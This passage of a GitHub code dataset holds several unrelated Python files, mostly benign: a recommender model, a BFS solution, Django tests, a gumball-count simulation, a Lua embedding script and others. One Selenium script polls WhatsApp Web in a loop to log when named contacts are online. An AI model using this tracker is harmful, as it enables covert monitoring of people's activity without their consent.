numpy as 
np\nimport pandas as pd\nimport json\n\nfrom tqdm import tqdm\nfrom model.sequence.Encoder import Encoder\nfrom model.sequence.Attention import Attention\nfrom handler.dataset import generate_train_dataset, generate_embedding, generate_evaluation_dataset\nfrom tensorflow.keras.callbacks import ModelCheckpoint\nfrom fire import Fire\n\nclass Recommender(object):\n\n def __init__(self,\n epoch=5,\n batch_size=256,\n evaluation_ratio=0.1,\n encoder_units=256,\n history_length=15):\n\n self.epoch = epoch\n self.batch_size = batch_size\n self.evaluation_ratio = evaluation_ratio\n self.encoder_units = encoder_units\n self.history_length = history_length\n\n self.model = self._build_model()\n\n def _build_model(self):\n\n self.embedding_mx = generate_embedding(path_to_dictionary=\"./data/positional_dictionary.json\",\n path_to_embedding=\"./data/embedding.npz.npy\")\n\n self.vocab_size = self.embedding_mx.shape[0]\n self.embedding_dim = self.embedding_mx.shape[1]\n\n with tf.name_scope(\"data\"):\n user_input = tf.keras.Input(shape=(self.history_length,))\n item_input = tf.keras.Input(shape=(1,))\n\n with tf.name_scope(\"model\"):\n # Sequential model\n encoder = Encoder(vocab_size=self.vocab_size,\n embedding_dim=self.embedding_dim,\n enc_units=self.encoder_units,\n batch_size=self.batch_size,\n embedding_mx=self.embedding_mx)\n sample_output, sample_hidden = encoder(user_input)\n # Attention layer\n attention_layer = Attention(units=10, history=self.history_length)\n attention_result, attention_weights = attention_layer(sample_hidden, sample_output)\n # user dense layer\n #user = tf.keras.layers.Dense(units=512, activation=\"relu\")(attention_result)\n user = tf.keras.layers.Dense(units=256, activation=\"relu\")(attention_result)\n user = tf.keras.layers.Dense(units=128, activation=\"relu\")(user) # chain on the previous layer (was re-applied to the attention output)\n user = tf.keras.layers.Dense(units=64, activation=\"relu\")(user)\n # user = tf.keras.layers.Dropout(0.1)(user)\n # item dense layer\n item = encoder.embedding(item_input)\n item = tf.keras.backend.squeeze(item, axis=1)\n item = tf.keras.layers.Dense(units=256, activation=\"relu\")(item)\n item = tf.keras.layers.Dense(units=128, activation=\"relu\")(item)\n item = tf.keras.layers.Dense(units=64, activation=\"relu\")(item)\n # item = tf.keras.layers.Dropout(0.1)(item)\n # dot product\n logit = tf.keras.layers.Dot(axes=1)([user, item])\n pred = tf.keras.layers.Activation(activation='sigmoid')(logit)\n\n with tf.name_scope(\"train\"):\n model = tf.keras.Model(inputs=[user_input, item_input], outputs=pred)\n model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=0.0001),\n loss='binary_crossentropy',\n metrics=['accuracy'])\n return model\n\n def train(self):\n data, label = generate_train_dataset(\"./data/test.parquet\")\n filepath = \"./data/checkpoints/more_history/model-{epoch:02d}.hdf5\"\n checkpoint = ModelCheckpoint(filepath,\n monitor='val_acc',\n save_weights_only=True,\n verbose=1)\n self.model.fit(x=data,\n y=label,\n batch_size=self.batch_size,\n shuffle=True,\n epochs=self.epoch,\n callbacks=[checkpoint])\n\n def test(self, test_file):\n\n with open(test_file) as fp:\n ids = [line[:-1] for line in fp]\n\n df = pd.read_parquet(\"./data/test.parquet\")\n df = df.set_index(\"id\")\n item = np.reshape(np.load(\"./data/test_1000.npy\"), (-1, 1))\n with open(\"./data/dictionary.json\") as fp:\n dictionary = json.load(fp)\n dictionary = dict([(value, key) for key, value in dictionary.items()])\n rec_fp = open(\"./recommend.txt\", \"w+\")\n\n 
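# Scoring sketch (comment added for clarity; not in the original file): the model\n # scores one (history, item) pair per row, so ranking every candidate item for a\n # user is a single batched predict, e.g. scores = model.predict([histories, items])\n # followed by scores.argsort()[::-1] for a best-first ordering, as done below.\n 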
self.model.load_weights(\"./data/checkpoints/more_history/model-02.hdf5\")\n\n for id in tqdm(ids):\n\n rec_fp.write(\"{} \".format(id))\n\n if not any(df.index.isin([id])):\n\n for i in range(100):\n rec_fp.write(\"{} \".format(item[i][0]))\n rec_fp.write(\"\\n\")\n continue\n\n train = generate_evaluation_dataset(df, id, item.shape[0])\n pred = np.reshape(self.model.predict(x=[train, item], batch_size=self.batch_size), (-1))\n rec = pred.argsort()\n rec = rec[::-1]\n accuracy = [pred[idx] for idx in rec]\n name = [item[elem][0] for elem in rec]\n\n for elem in name:\n rec_fp.write(\"{} \".format(dictionary[elem]))\n rec_fp.write(\"\\n\")\n\n # name_dict = {}\n # for idx, key in enumerate(name):\n # name_dict[key] = idx\n #\n # sample = df.loc[id]\n # for key in np.unique(sample[\"eval\"]):\n # if key in name_dict:\n # print(\"\\n\", name_dict[key])\n # else:\n # print(\"\\n KeyError\")\n\n rec_fp.close() # close the recommendations file (fp was already closed by its with-block)\n\nif __name__ == \"__main__\":\n model = Recommender()\n# model.train()\n model.test(\"./data/predict/dev.users\")\n# Fire(Recommender)\n\n\n\n","repo_name":"k920049/brunch-hgru","sub_path":"model/legacy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5856,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4081494552","text":"\"\"\"\nWritten by Joseph Surrey 4/04/2023\nUpdated 21/04/2023 changed format of weights to work with random.choices()\nUpdated 21/04/2023 to add the instructions for the game\nConstants to be used in project\n\"\"\"\n\n# How much the user wins from each token\nTOKEN_VALUE = [[\"unicorn\", 5.0], [\"zebra\", 0.5], [\"horse\", 0.5], [\"donkey\", 0]]\n# Chance of each token being generated\nTOKEN_WEIGHT = [0.1, 0.3, 0.3, 0.3]\n# Maximum spend per game\nMAX_SPEND = 10\n# How much each round costs\nROUND_PRICE = 1\n# Instructions\nINSTRUCTIONS = \"Instructions for Lucky Unicorn game\"\n","repo_name":"josephsurrey/Lucky-Unicorn_2.01","sub_path":"setup_v1.py","file_name":"setup_v1.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42690136584","text":"import sys\nfrom collections import deque\n\ndef bfs(q, time):\n while q:\n time += 1\n for _ in range(len(q)):\n p = q.popleft()\n if p == k:\n return time\n a, b, c = p-1, p+1, 2*p\n if (0 <= a <= 100000) and graph[a] == 0:\n graph[a] = 1\n q.append(a)\n if (0 <= b <= 100000) and graph[b] == 0:\n graph[b] = 1\n q.append(b)\n if (0 <= c <= 100000) and graph[c] == 0:\n graph[c] = 1\n q.append(c)\n\nn, k = map(int, sys.stdin.readline().split())\n\ngraph = [0] * 100001\ngraph[n] = 1\nq = deque()\nq.append(n)\ntime = -1\nprint(bfs(q, time))","repo_name":"ecvheo1/Algorithms","sub_path":"BOJ/DFS & BFS/1697.py","file_name":"1697.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39666022446","text":"import asyncio\nimport os\nfrom unittest import mock\n\nimport pytest\nfrom async_asgi_testclient import TestClient\nfrom django.http import HttpResponse\nfrom django.urls.conf import path\n\nfrom django_simple_task import defer\n\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"tests.settings\"\n\n\n@pytest.fixture\nasync def get_app():\n async def _get_app(patterns, asgi_version=3, inner_asgi_version=3):\n from . 
import urls, app\n\n urls.urlpatterns.clear()\n urls.urlpatterns.extend(patterns)\n test_app = (\n app.application\n if inner_asgi_version == 3\n else app.application_wrapping_asgi2\n )\n if asgi_version == 2:\n return app.application_wrapt_as_asgi2\n return test_app\n\n return _get_app\n\n\n@pytest.mark.asyncio\nasync def test_sanity_check(get_app):\n def view(requests):\n return HttpResponse(\"Foo\")\n\n app = await get_app([path(\"\", view)])\n async with TestClient(app) as client:\n resp = await client.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo\"\n\n app_asgi2 = await get_app([path(\"\", view)], 2)\n async with TestClient(app_asgi2) as client_asgi2:\n resp = await client_asgi2.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo\"\n\n app_wrapping_asgi2 = await get_app([path(\"\", view)], 3, 2)\n async with TestClient(app_wrapping_asgi2) as client_wrapping_asgi2:\n resp = await client_wrapping_asgi2.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo\"\n\n\n@pytest.mark.asyncio\nasync def test_should_call_task(get_app):\n task = mock.MagicMock()\n\n def view(requests):\n defer(task)\n return HttpResponse(\"Foo1\")\n\n app = await get_app([path(\"\", view)])\n async with TestClient(app) as client:\n task.assert_not_called()\n resp = await client.get(\"/\")\n assert resp.status_code == 200\n assert resp.text == \"Foo1\"\n task.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_should_call_async_task(get_app):\n cb = mock.MagicMock()\n\n async def task():\n await asyncio.sleep(1)\n cb()\n\n def view(requests):\n defer(task)\n defer(task)\n defer(task)\n defer(task)\n return HttpResponse(\"Foo\")\n\n app = await get_app([path(\"\", view)])\n async with TestClient(app) as client:\n cb.assert_not_called()\n resp = await client.get(\"/\")\n assert resp.text == \"Foo\"\n cb.assert_not_called()\n assert cb.call_count == 4\n","repo_name":"ericls/django-simple-task","sub_path":"tests/test_django_simple_task.py","file_name":"test_django_simple_task.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"31"} +{"seq_id":"38694762969","text":"## Gumball Counting Project ##\nimport math\nimport numpy as np\nfrom scipy.stats import norm, sem, t\nimport matplotlib.pyplot as plt\n\n# Total gumballs: 659\n\n\ndef volume_of_cylinder(height, circumference):\n # V = πr^2h\n ## NOTE: r = C/(2*pi)\n radius = circumference/(2*math.pi)\n return math.pi * (radius ** 2) * height\n\n\ndef volume_of_sphere(diameter):\n # V = 4/3πr^3 \n ## NOTE: r = d/2\n radius = diameter/2\n return (4/3) * math.pi * radius**3\n\n\ndef estimate_gumballs_in_jar(jar_height, jar_circumference, gumball_diameter, jar_fill_percentage, packing_efficiency):\n # (parameter renamed from jar_diameter: the value passed in is the jar's circumference)\n jar_volume = volume_of_cylinder(jar_height, jar_circumference)\n gumball_volume = volume_of_sphere(gumball_diameter) # Assuming gumballs are perfectly spherical\n \n # The volume of space in the jar that the gumballs can fill is \n # the jar's volume times the packing efficiency times the fill percentage\n space_for_gumballs = jar_volume * packing_efficiency * jar_fill_percentage\n \n # Now we can find how many gumballs can fit in this space\n estimated_gumballs = space_for_gumballs / gumball_volume\n return estimated_gumballs\n
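\n# Worked example (added; numbers are illustrative): with the inputs used below,\n# h = 0.144 m and C = 0.453 m give r = C/(2*pi) ~= 0.072 m and V_jar ~= 2.35 L; a\n# 15.5 mm gumball is ~1.95 mL, so at ~64% packing a completely full jar would hold\n# roughly 2350 * 0.64 / 1.95 ~= 770 gumballs before the fill fraction is applied.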
\n\ndef simulate_gumball_estimations(jar_height, jar_circumference, gumball_diameter, jar_fill_percentage, num_simulations):\n # Store the results of all simulations here\n all_estimations = []\n\n for _ in range(num_simulations):\n # Sample packing efficiency from a beta distribution \n # Shift and scale to be in the range [0.64, 0.74]\n packing_efficiency = 0.64 + np.random.beta(a=2, b=5) * 0.1\n\n # Randomly vary gumball diameter by +/- 1%\n varied_gumball_diameter = gumball_diameter * np.random.uniform(0.99, 1.01)\n\n estimation = estimate_gumballs_in_jar(jar_height, \n jar_circumference, \n varied_gumball_diameter, \n jar_fill_percentage, \n packing_efficiency)\n all_estimations.append(estimation)\n \n # Calculate standard error of the mean (SEM) and 95% Confidence Interval\n mu = np.mean(all_estimations)\n std = np.std(all_estimations)\n med = np.median(all_estimations)\n standard_error = sem(all_estimations)\n confidence_interval = t.interval(confidence=0.95, \n df=len(all_estimations)-1, \n loc=mu, \n scale=standard_error)\n return all_estimations, mu, std, med, standard_error, confidence_interval, packing_efficiency\n\n\ndef plot_histogram_with_distribution(all_estimations, mu, std, num_simulations):\n # Plot the histogram\n plt.hist(all_estimations, bins=25, density=True, alpha=0.6, color='g')\n\n # Plot the distribution using the sample mean and standard deviation passed in\n xmin, xmax = plt.xlim()\n x = np.linspace(xmin, xmax, 100)\n p = norm.pdf(x, mu, std)\n plt.plot(x, p, 'k', linewidth=2)\n\n # Add a red dashed line at the mean (apex of the distribution)\n plt.axvline(mu, color='r', linestyle='dashed', linewidth=2)\n \n plt.title(f\"Fit Results for {num_simulations} Runs\")\n plt.show()\n\n\ndef box_and_whisker_plot(all_estimations):\n plt.figure(figsize=(10,6))\n plt.boxplot(all_estimations, vert=False)\n plt.title('Box and Whisker Plot of Estimations')\n plt.xlabel('Estimated Number of Gumballs')\n plt.show()\n\n\ndef plot_cdf(all_estimations):\n plt.figure(figsize=(10,6))\n values, base = np.histogram(all_estimations, bins=40)\n cumulative = np.cumsum(values) / np.sum(values)\n plt.plot(base[:-1], cumulative)\n\n # Adding the red dashed lines for the median\n median = np.median(all_estimations)\n plt.axvline(median, color='r', linestyle='dashed', linewidth=2)\n plt.axhline(0.5, color='r', linestyle='dashed', linewidth=2)\n\n plt.title('Cumulative Distribution Function (CDF) of Estimations')\n plt.xlabel('Estimated Number of Gumballs')\n plt.ylabel('Cumulative Probability')\n plt.show()\n \n\ndef run_and_plot(jar_height, jar_circumference, gumball_diameter, jar_fill_percentage, simulation_counts):\n results = []\n for i, num_simulations in enumerate(simulation_counts, start=1):\n all_estimations, mu, std, med, std_err, ci, packing_efficiency = simulate_gumball_estimations(jar_height, \n jar_circumference, \n gumball_diameter, \n jar_fill_percentage, \n num_simulations)\n \n # Uncomment the following lines as needed to produce the different plots\n plot_histogram_with_distribution(all_estimations, mu, std, num_simulations)\n box_and_whisker_plot(all_estimations)\n #plot_cdf(all_estimations)\n \n results.append((mu, std, std_err, ci))\n print(f\"Run {i}: Mean = {mu:.2f}; Median = {med:.2f}, Std Dev = {std:.2f}; SEM = {std_err:.2f}; CI = ({round(ci[0], 2)}, {round(ci[1], 2)})\")\n return results\n\n\n# Model Inputs\n'''\nThe variable 'a' represents manual measurements of randomly selected gumballs\nso an average diameter could be established. 
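Note (added for clarity): the measurements are in millimetres, and their mean is used as the nominal gumball diameter in the model inputs below. 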
\n\nSEM = Standard Error of the Mean\n'''\na = [15,15,15,15,16,16,16,15.5,15,15.5,15.5,15,15.5,15,15.5,15,15,15,\n 15,15,15.5,15.5,15,15.5,15.5,15.5,15.5,15,15.5,15.5,15,15,15,15.5,\n 15.5,15,15,15,15.5,15,15.5,15.5,15,15.5,15.5,15,15,15.5,15,15.5,\n 15.5,15.5,15,15.5,15.5,15.5,16,16,15,15,15,15] # mm\n\navg_gumball_diameter = np.mean(a) # mm\nnum_simulations = [10, 100, 1000, 10000]\njar_height = 0.144 # m\nfree_space = 0.076 # m\nused_height = jar_height - free_space # m\njar_circumference = 0.453 # m\ngumball_diameter = avg_gumball_diameter/1000 # m\n\ntotal_cylinder_volume = volume_of_cylinder(jar_height,jar_circumference) # m^3\nused_cylinder_volume = volume_of_cylinder(used_height,jar_circumference) # m^3\njar_fill_percentage = (used_cylinder_volume/total_cylinder_volume) * 0.7\n\nmeans = run_and_plot(jar_height, jar_circumference, gumball_diameter, \n jar_fill_percentage, \n num_simulations)\n\nactual_gumball_count = 97+83+104\npredicted_gumball_count = int(np.floor(means[3][0]))\nexperimental_accuracy = (predicted_gumball_count/actual_gumball_count)*100\nprint(f\"Experimental Accuracy: {experimental_accuracy:.2f}%\")\n","repo_name":"NavyDevilDoc/Gumball_Counting","sub_path":"Gumball_Counting.py","file_name":"Gumball_Counting.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20426790049","text":"import os\nimport random\nimport torch\nimport numpy as np\nimport datetime\nfrom transformers import AutoTokenizer\n\n# seed \ndef seed_everything(seed: int = 42, contain_cuda: bool = False):\n os.environ['PYTHONHASHSEED'] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n print(f\"Seed set as {seed}\")\n\n# tokenizer\ndef get_tokenizer():\n tokenizer = AutoTokenizer.from_pretrained(\"kykim/bert-kor-base\")\n return tokenizer\n \n# token \ndef sentence_to_token(dataset,tokenizer):\n labels = dataset['label'].values\n input_ids = []\n attention_masks = []\n\n for sent in dataset['sentence']:\n encoded_dict = tokenizer.encode_plus(\n sent, \n add_special_tokens = True, \n max_length = 64, \n pad_to_max_length = True,\n return_attention_mask = True, \n return_tensors = 'pt', \n )\n \n input_ids.append(encoded_dict['input_ids'])\n attention_masks.append(encoded_dict['attention_mask'])\n\n\n input_ids = torch.cat(input_ids, dim=0)\n attention_masks = torch.cat(attention_masks, dim=0)\n labels = torch.tensor(labels)\n return input_ids, attention_masks, labels\n\n# score\ndef flat_accuracy(preds, labels):\n pred_flat = np.argmax(preds, axis=1).flatten()\n labels_flat = labels.flatten()\n return np.sum(pred_flat == labels_flat) / len(labels_flat)\n\n# time\ndef format_time(elapsed):\n elapsed_rounded = int(round((elapsed)))\n return str(datetime.timedelta(seconds=elapsed_rounded))","repo_name":"JDK6259/Korean-Language-Classification","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18702341429","text":"import time\nimport os\n\n# selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.keys import Keys\nfrom 
selenium.webdriver.common.by import By\nfrom selenium.webdriver import DesiredCapabilities\nfrom selenium.webdriver.chrome.service import Service\n\n# kill all chrome and chromedriver processes\nos.system(\"pkill chrome\")\nos.system(\"pkill chromedriver\")\n\n# web page element paths\nNEW_CHAT_BTN = \"/html/body/div[1]/div/div/div[3]/div/header/div[2]/div/span/div[2]/div/span\"\nINPUT_TXT_BOX = \"/html/body/div[1]/div/div/div[2]/div[1]/span/div/span/div/div[1]/div/div/div[2]/div/div[2]\"\nONLINE_STATUS_LABEL = \"/html/body/div[1]/div/div/div[4]/div/header/div[2]/div[2]/span\"\n\n# chat list of users\nTARGETS = {'whatsapp user 1 name': 'phone number 1',\n 'whatsapp user 2 name': 'phone number 2'}\n\noptions = webdriver.ChromeOptions()\noptions.add_argument(\"--user-data-dir=/home/bhagirath/.config/google-chrome/\")\noptions.add_argument(\"--profile-directory=Default\")\ncapabilities = DesiredCapabilities.CHROME.copy()\n\nservice = Service(\"./driver/chromedriver\")\n\nbrowser = webdriver.Chrome(service=service, options=options, desired_capabilities=capabilities)\n\nbrowser.get(\"https://web.whatsapp.com/\")\nwait = WebDriverWait(browser, 60)\n\nwhile True:\n for target in TARGETS:\n tryAgain = True\n new_chat_title = wait.until(\n EC.presence_of_element_located((By.XPATH, NEW_CHAT_BTN)))\n while tryAgain:\n try:\n new_chat_title.click()\n input_box = wait.until(\n EC.presence_of_element_located((By.XPATH, INPUT_TXT_BOX)))\n time.sleep(0.5)\n input_box.send_keys(TARGETS[target])\n time.sleep(0.5)\n input_box.send_keys(Keys.ENTER)\n time.sleep(2)\n tryAgain = False\n try:\n try:\n browser.find_element(By.XPATH, ONLINE_STATUS_LABEL)\n print(target + ' is online')\n except Exception:\n print(target + ' is offline')\n time.sleep(1)\n except Exception:\n print('Exception 1: status element does not exist.')\n time.sleep(10)\n except Exception:\n print('Exception 2: chat does not exist.')\n time.sleep(4)\n","repo_name":"bhagirath-radadiya/whatsapp-online-status-tracker","sub_path":"whatsapp_selenium.py","file_name":"whatsapp_selenium.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74936263766","text":"# https://youtu.be/FB0KUhsxXGY\n\nclass Solution:\n def minimumSubsetSum(self, nums):\n total = sum(nums)\n s = total // 2\n n = len(nums)\n dp = [[False] * (s+1) for _ in range(n)]\n\n for i in range(n):\n dp[i][0] = True\n\n for j in range(1, s+1):\n dp[0][j] = nums[0] == j\n\n for i in range(1, n):\n for j in range(1, s+1):\n if dp[i-1][j]:\n dp[i][j] = dp[i-1][j]\n elif j >= nums[i]:\n dp[i][j] = dp[i-1][j-nums[i]]\n\n for j in range(s, -1, -1):\n if dp[n-1][j]:\n # ans = abs(sum1 - sum2); sum1 = j; sum2 = total - j\n return abs(j - (total - j))\n","repo_name":"AlveeM/coding-problems-old","sub_path":"dynamic-programming/patterns-dynamic-programming/01-0_1-knapsack/03_minimum_subset_sum_difference.py","file_name":"03_minimum_subset_sum_difference.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22886770931","text":"\n# 10. Create a class BANK with two functions, simple interest and compound interest. 
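(Formulas used below, added for reference: simple interest = P*R*T/100; compound interest = P*(1 + R/100)**T - P.)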
\n# You need to create instances for the pnb, icici and hdfc banks with corresponding input.\n\nclass BANK:\n def __init__(self, principal, rate, time):\n self.Principal = principal\n self.Rate = rate\n self.Time = time\n\n def simpleInterest(self):\n Amount = (self.Principal*self.Rate*self.Time)/100\n return Amount\n\n def compoundInterest(self):\n Amount = self.Principal*(pow((1 + self.Rate/100), self.Time)) - self.Principal\n return Amount\n\nbName = input(\"Please enter your bank name pnb/icici/hdfc: \")\nprincipal = int(input(\"Please enter your principal amount: \"))\nrate = int(input(\"Please enter rate: \"))\ntime = int(input(\"Please enter time: \"))\n\nif bName == \"pnb\":\n pnb = BANK(principal, rate, time)\n print(\"PNB simple interest: \", pnb.simpleInterest())\n print(\"PNB compound interest: \", pnb.compoundInterest())\nelif bName == \"icici\":\n icici = BANK(principal, rate, time)\n print(\"ICICI simple interest: \", icici.simpleInterest())\n print(\"ICICI compound interest: \", icici.compoundInterest())\nelif bName == \"hdfc\":\n hdfc = BANK(principal, rate, time)\n print(\"HDFC simple interest: \", hdfc.simpleInterest())\n print(\"HDFC compound interest: \", hdfc.compoundInterest())\nelse:\n print(\"You entered an invalid bank name, please try again!\")","repo_name":"AnujKV123/python-Assignments","sub_path":"Assignment3_Anuj_Verma/question10.py","file_name":"question10.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33383244991","text":"#!/usr/bin/python3\n# coding=utf-8\n\n\"\"\"\nThe Santa tracking module for schongo :D\n\"\"\"\n\nimport urllib.request as request\nfrom time import time\nimport json\n__info__ = {\n\t\"Author\": \"Ross Delinger\",\n\t\"Version\": \"1.1\",\n\t\"Dependencies\": [\n\t\t\"_timer\"\n\t]\n}\nglobal chan, net, lastLoc\nchan = ''\nnet = ''\ndataURL = \"http://www.noradsanta.org/js/data.js\"\nlastLoc = ''\ndef onLoad():\n\tdata = request.urlopen(request.Request(dataURL)).read()\n\tdata = data.split(b\"=\",1)[1]\n\tlocList = json.loads(data.decode('utf-8'))\n\tprint(\"Entries: %d\" % len(locList))\n\n\t@timer(60,True)\n\tdef updateTimer():\n\t\tglobal lastLoc,net,chan\n\t\tcurrentTotal = (int(time()) - 1324710000) / 60\n\n\t\tfor stop in locList:\n\t\t\tt = stop['time'].split(':')\n\t\t\th = int(t[0])\n\t\t\tm = int(t[1])\n\t\t\ttotal = (h * 60) + m\n\t\t\toffset = stop['travel_time'].split(\":\")\n\t\t\tif offset == ['']:\n\t\t\t\toffset = ['','']\n\t\t\tif offset[0] != '':\n\t\t\t\toffsetH = int(offset[0])\n\t\t\telse:\n\t\t\t\toffsetH = 0\n\t\t\tif offset[1] != '':\n\t\t\t\toffsetM = int(offset[1])\n\t\t\telse:\n\t\t\t\toffsetM = 0\n\t\t\toffsetTotal = (offsetH * 60) + offsetM\n\t\t\tif currentTotal > total and currentTotal < (total + offsetTotal):\n\t\t\t\tloc = stop['full_location']\n\t\t\t\tif loc != lastLoc:\n\t\t\t\t\tctx = IrcContext(net, chan, None)\n\t\t\t\t\tctx.reply(\"Current location: %s\" % loc, \"@Santa\")\n\t\t\t\t\tlastLoc = loc\n\t\t\t\t\tbreak\n\t\treturn True\n\t@command(\"track\", 0, 0)\n\tdef track(ctx, cmd, arg, *args):\n\t\tglobal chan\n\t\tglobal net\n\t\tctx.reply(\"Santa tracking coming online... 
Engaging json intercept-omatic\", \"SantaTracker\")\n\t\tchan = ctx.chan\n\t\tnet = ctx.irc.network\n\t\tupdateTimer.start()\n\t@hook(\"module_unload\")\n\tdef timer_stop(ctx):\n\t\tupdateTimer.stop()\n","repo_name":"DarkDNA/Schongo-Modules","sub_path":"toys/santa.py","file_name":"santa.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6670458322","text":"from utils import retornarlistas\nimport pandas as pd\n\ndef lista_secoes():\n\n url = \"https://dadosabertos.almg.gov.br/ws/agenda/secoes\"\n response = retornarlistas(url)\n lista = response['list']\n df = pd.DataFrame.from_dict(lista)\n df.to_excel(r'./agenda/lista_secoes.xlsx')\n\ndef lista_categorias():\n\n url = \"https://dadosabertos.almg.gov.br/ws/agenda/categorias\"\n response = retornarlistas(url)\n print(response)\n\nlista_categorias()","repo_name":"thlanza/python-assembleia","sub_path":"teste-api-dadosabertos/teste-agenda.py","file_name":"teste-agenda.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42309049579","text":"'''\nFile:debug_log.py\nAuthor:ezgameworkplace\nDate:2023/1/6\n'''\nimport functools\nimport inspect\nimport logging\nimport os\n\nfrom green_GA.commands import Commands\n\n\ndef get_command_name(command_value):\n for command_name, value in vars(Commands).items():\n if value == command_value:\n return command_name\n raise ValueError(\"Command value not found.\")\n\n\ndef setup_logging(file_path, size_limit=10000000, count_lines=5000):\n if not os.path.exists(file_path):\n with open(file_path, 'w'):\n pass # create an empty file if it does not exist\n\n logging.basicConfig(filename=file_path,\n level=logging.DEBUG,\n format='%(asctime)s:%(levelname)s:%(message)s')\n\n size = os.path.getsize(file_path) # in bytes\n if size > size_limit:\n with open(file_path, \"r\") as f:\n lines = f.readlines()\n del lines[count_lines:]\n with open(file_path, \"w\") as f:\n f.writelines(lines)\n\n return logging.getLogger()\n\n\ndef debug_log(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n sig = inspect.signature(func)\n bound_args = sig.bind(*args, **kwargs)\n self = bound_args.arguments.get('self')\n\n if self.debug_mode:\n if type(self).__name__ == 'UnitySDK':\n filename = self.port + \".log\"\n else:\n raise Exception(\"The debug_log decorator can only be used with UnitySDK\")\n\n file_path = os.path.join(os.getcwd(), filename)\n logger = setup_logging(file_path)\n logger.setLevel(logging.DEBUG)\n\n command = bound_args.arguments.get('command')\n if command is not None:\n logger.debug(f\"The 'command' argument for {func.__name__} is: {get_command_name(command)}\")\n\n logger.debug(f\"Calling {func.__name__} with args: {args} and kwargs: {kwargs}\")\n try:\n result = func(*args, **kwargs)\n status = 1\n except Exception as e:\n logger.exception(f\"An error occurred while executing {func.__name__}: {e}\")\n result = None\n status = 0\n\n logger.debug(f\"{func.__name__} returned status: {status}\")\n return result\n else:\n return func(*args, **kwargs)\n\n return wrapper\n","repo_name":"ezgameworkplace/green_GA","sub_path":"green_GA/debug_log.py","file_name":"debug_log.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"25689199478","text":"import os\nimport re\nfrom subprocess import call \nfrom shutil import copyfile\n\ndef find_luas(dir, targets=None):\n 
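\"\"\"Recursively collect the paths of all .lua files under dir (docstring added for clarity).\"\"\"\n 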
if targets is None: targets = []\n\n items = os.listdir(dir)\n\n for item in items:\n full_path = os.path.join(dir, item)\n\n if os.path.isdir(full_path):\n find_luas(full_path, targets)\n elif os.path.isfile(full_path) and item.endswith(\".lua\"):\n targets.append(full_path)\n\n return targets\n\n\ndef compile_auxiliaries(opts):\n\n print(\"building auxiliary library...\")\n\n # compile the auxiliary library with luac\n\n targets = find_luas(opts['auxiliaries_dir'])\n \n command = [opts['luac_path']]\n \n for target in targets:\n print(\" found: {target}\".format(target=target))\n command.append(target)\n\n call(command)\n\n # read generated lua bytecode\n\n generated_file = open(\"luac.out\", 'rb')\n binary_data = generated_file.read()\n generated_file.close()\n\n os.remove(\"luac.out\")\n\n # convert bytecode into a binary string constant\n\n arr_initializer = \"\"\n\n for i in range(0, len(binary_data)):\n if i % 8 == 0: \n arr_initializer += \"\\n \"\n\n term = hex(binary_data[i])\n \n if i < len(binary_data) - 1: \n term += \", \"\n\n term = \"(char)\" + term + \" \" * (6 - len(term))\n\n arr_initializer += \"{0}\".format(term)\n\n # write the header file\n\n\n header_preamble = \"// THIS FILE WAS GENERATED BY A SCRIPT - DO NOT EDIT IT DIRECTLY\\n// GENERATED FROM {aux_entry}\\n\".format(\n aux_entry=opts['auxiliaries_dir']\n )\n\n header_source = \"\"\"\n{PREAMBLE}\n\n#pragma once\n#include <{LUA_HEADER}>\n\nint {LOAD_FUNCTION} (lua_State * L) {{\n const char buffer[] = {{{BUFFER}\n }};\n\n return luaL_loadbufferx(L, buffer, sizeof(buffer), \"auxiliary library\", \"b\");\n}};\n \"\"\"\n\n header_source = header_source.format(\n PREAMBLE=header_preamble,\n LUA_HEADER=opts['lua_header'],\n LOAD_FUNCTION=opts['auxiliaries_loadfunc'],\n BUFFER=arr_initializer\n )\n\n header_file = open(opts['auxiliaries_header'], \"w\")\n header_file.write(header_source)\n header_file.close()\n\n 